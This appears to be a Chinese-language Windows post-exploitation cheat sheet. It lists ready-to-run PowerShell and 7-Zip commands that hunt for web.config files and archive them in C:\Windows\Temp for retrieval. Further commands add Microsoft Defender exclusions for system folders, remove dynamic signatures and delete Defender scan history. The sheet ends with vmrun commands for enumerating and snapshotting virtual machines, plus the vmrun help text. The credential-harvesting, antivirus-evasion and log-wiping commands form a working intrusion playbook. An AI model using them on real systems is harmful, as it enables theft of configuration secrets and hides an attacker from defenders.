Windows 后渗透
文件挖掘回传
Get-ChildItem -Path E:\ -Filter Web.Config -Recurse -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName
Compress-Archive -Path (Get-ChildItem -Path "E:\" -Filter "Web.Config" -Recurse -ErrorAction SilentlyContinue).FullName -DestinationPath "C:\Windows\Temp\webconfigs.zip"
Get-ChildItem -Path "E:\" -Filter "web.config" -Recurse -ErrorAction SilentlyContinue | ForEach-Object { $_.FullName.Substring(3) } | Set-Content "C:\Windows\Temp\webconfigs.txt" -Encoding utf8
# 切换为 cmd
C:\Windows\Temp\7zr.exe a -t7z "C:\Windows\Temp\webconfigs.7z" -scsUTF-8 @"C:\Windows\Temp\webconfigs.txt"
Internet Information Services (IIS)
列出网站目录
c:\windows\system32\inetsrv\appcmd list vdir
Microsoft Defender
查询排除项
Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionProcess, ExclusionExtension
添加排除项
Add-MpPreference -ExclusionPath "D:\MySafeFolder"
Add-MpPreference -ExclusionPath "C:\Windows\Temp"
Add-MpPreference -ExclusionPath "C:\Windows\System32"
Add-MpPreference -ExclusionPath "C:\Users\Public\Libraries"
取消排除项
Remove-MpPreference -ExclusionPath "C:\Windows\Temp"
查询情报
Get-MpThreatDetection
删除情报
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDynamicSignature
# Powershell
Remove-Item "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\*" -Recurse -Force
Vmware Workstation
"C:\Program Files (x86)\VMware\VMware Player\vmrun.exe"
"C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe"
收集所有在运行的虚拟机
需要注意的是,这里运行命令进行查询的权限需要与运行虚拟机的用户权限一致,过高或者过低都会导致查询不到虚拟机
"C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe" list
收集所有的虚拟机网卡
"C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe" listHostNetworks
获取虚拟机网卡地址
"C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe" -T ws getGuestIPAddress "E:\WIN11E TS - TPE NEW GRM 09\WIN11E TS - TPE.vmx" -wait
制作快照
"C:\Program Files (x86)\VMware\VMware Player\vmrun.exe" -T ws snapshot "C:\VM\WinServer_2012R2\Windows Server 2012.vmx" 2025-07-11
工具参考
vmrun
vmrun version 1.17.0 build-20800274
Usage: vmrun [AUTHENTICATION-FLAGS] COMMAND [PARAMETERS]
AUTHENTICATION-FLAGS
--------------------
These must appear before the command and any command parameters.
-T <hostType> (ws|fusion||player)
-vp <password for encrypted virtual machine>
-gu <userName in guest OS>
-gp <password in guest OS>
POWER COMMANDS PARAMETERS DESCRIPTION
-------------- ---------- -----------
start Path to vmx file Start a VM or Team
[gui|nogui]
stop Path to vmx file Stop a VM or Team
[hard|soft]
reset Path to vmx file Reset a VM or Team
[hard|soft]
suspend Path to vmx file Suspend a VM or Team
[hard|soft]
pause Path to vmx file Pause a VM
unpause Path to vmx file Unpause a VM
SNAPSHOT COMMANDS PARAMETERS DESCRIPTION
----------------- ---------- -----------
listSnapshots Path to vmx file List all snapshots in a VM
[showTree]
snapshot Path to vmx file Create a snapshot of a VM
Snapshot name
deleteSnapshot Path to vmx file Remove a snapshot from a VM
Snapshot name
[andDeleteChildren]
revertToSnapshot Path to vmx file Set VM state to a snapshot
Snapshot name
HOST NETWORK COMMANDS PARAMETERS DESCRIPTION
--------------------- ---------- -----------
listHostNetworks List all networks in the host
listPortForwardings Host network name List all available port forwardings on a host network
setPortForwarding Host network name Add or update a port forwarding on a host network
Protocol
Host port
Guest ip
Guest port
[Description]
deletePortForwarding Host network name Delete a port forwarding on a host network
Protocol
Host port
GUEST OS COMMANDS PARAMETERS DESCRIPTION
----------------- ---------- -----------
runProgramInGuest Path to vmx file Run a program in Guest OS
[-noWait]
[-activeWindow]
[-interactive]
Complete-Path-To-Program
[Program arguments]
fileExistsInGuest Path to vmx file Check if a file exists in Guest OS
Path to file in guest
directoryExistsInGuest Path to vmx file Check if a directory exists in Guest OS
Path to directory in guest
setSharedFolderState Path to vmx file Modify a Host-Guest shared folder
Share name
Host path
writable | readonly
addSharedFolder Path to vmx file Add a Host-Guest shared folder
Share name
New host path
removeSharedFolder Path to vmx file Remove a Host-Guest shared folder
Share name
enableSharedFolders Path to vmx file Enable shared folders in Guest
[runtime]
disableSharedFolders Path to vmx file Disable shared folders in Guest
[runtime]
listProcessesInGuest Path to vmx file List running processes in Guest OS
killProcessInGuest Path to vmx file Kill a process in Guest OS
process id
runScriptInGuest Path to vmx file Run a script in Guest OS
[-noWait]
[-activeWindow]
[-interactive]
Interpreter path
Script text
deleteFileInGuest Path to vmx file Delete a file in Guest OS
Path in guest
createDirectoryInGuest Path to vmx file Create a directory in Guest OS
Directory path in guest
deleteDirectoryInGuest Path to vmx file Delete a directory in Guest OS
Directory path in guest
CreateTempfileInGuest Path to vmx file Create a temporary file in Guest OS
listDirectoryInGuest Path to vmx file List a directory in Guest OS
Directory path in guest
CopyFileFromHostToGuest Path to vmx file Copy a file from host OS to guest OS
Path on host
Path in guest
CopyFileFromGuestToHost Path to vmx file Copy a file from guest OS to host OS
Path in guest
Path on host
renameFileInGuest Path to vmx file Rename a file in Guest OS
Original name
New name
typeKeystrokesInGuest Path to vmx file Type Keystrokes in Guest OS
keystroke string
connectNamedDevice Path to vmx file Connect the named device in the Guest OS
device name
disconnectNamedDevice Path to vmx file Disconnect the named device in the Guest OS
device name
captureScreen Path to vmx file Capture the screen of the VM to a local file
Path on host
writeVariable Path to vmx file Write a variable in the VM state
[runtimeConfig|guestEnv|guestVar]
variable name
variable value
readVariable Path to vmx file Read a variable in the VM state
[runtimeConfig|guestEnv|guestVar]
variable name
getGuestIPAddress Path to vmx file Gets the IP address of the guest
[-wait]
GENERAL COMMANDS PARAMETERS DESCRIPTION
---------------- ---------- -----------
list List all running VMs
upgradevm Path to vmx file Upgrade VM file format, virtual hw
installTools Path to vmx file Install Tools in Guest
checkToolsState Path to vmx file Check the current Tools state
deleteVM Path to vmx file Delete a VM
clone Path to vmx file Create a copy of the VM
Path to destination vmx file
full|linked
[-snapshot=Snapshot Name]
[-cloneName=Name]
Template VM COMMANDS PARAMETERS DESCRIPTION
--------------------- ---------- -----------
downloadPhotonVM Path for new VM Download Photon VM
Examples:
Starting a virtual machine with Workstation on a Windows host
vmrun -T ws start "c:\my VMs\myVM.vmx"
Running a program in a virtual machine with Workstation on a Windows host with Windows guest
vmrun -T ws -gu guestUser -gp guestPassword runProgramInGuest "c:\my VMs\myVM.vmx" "c:\Program Files\myProgram.exe"
Creating a snapshot of a virtual machine with Workstation on a Windows host
vmrun -T ws snapshot "c:\my VMs\myVM.vmx" mySnapshot
Reverting to a snapshot with Workstation on a Windows host
vmrun -T ws revertToSnapshot "c:\my VMs\myVM.vmx" mySnapshot
Deleting a snapshot with Workstation on a Windows host
vmrun -T ws deleteSnapshot "c:\my VMs\myVM.vmx" mySnapshot
Enabling Shared Folders with Workstation on a Windows host
vmrun -T ws enableSharedFolders "c:\my VMs\myVM.vmx"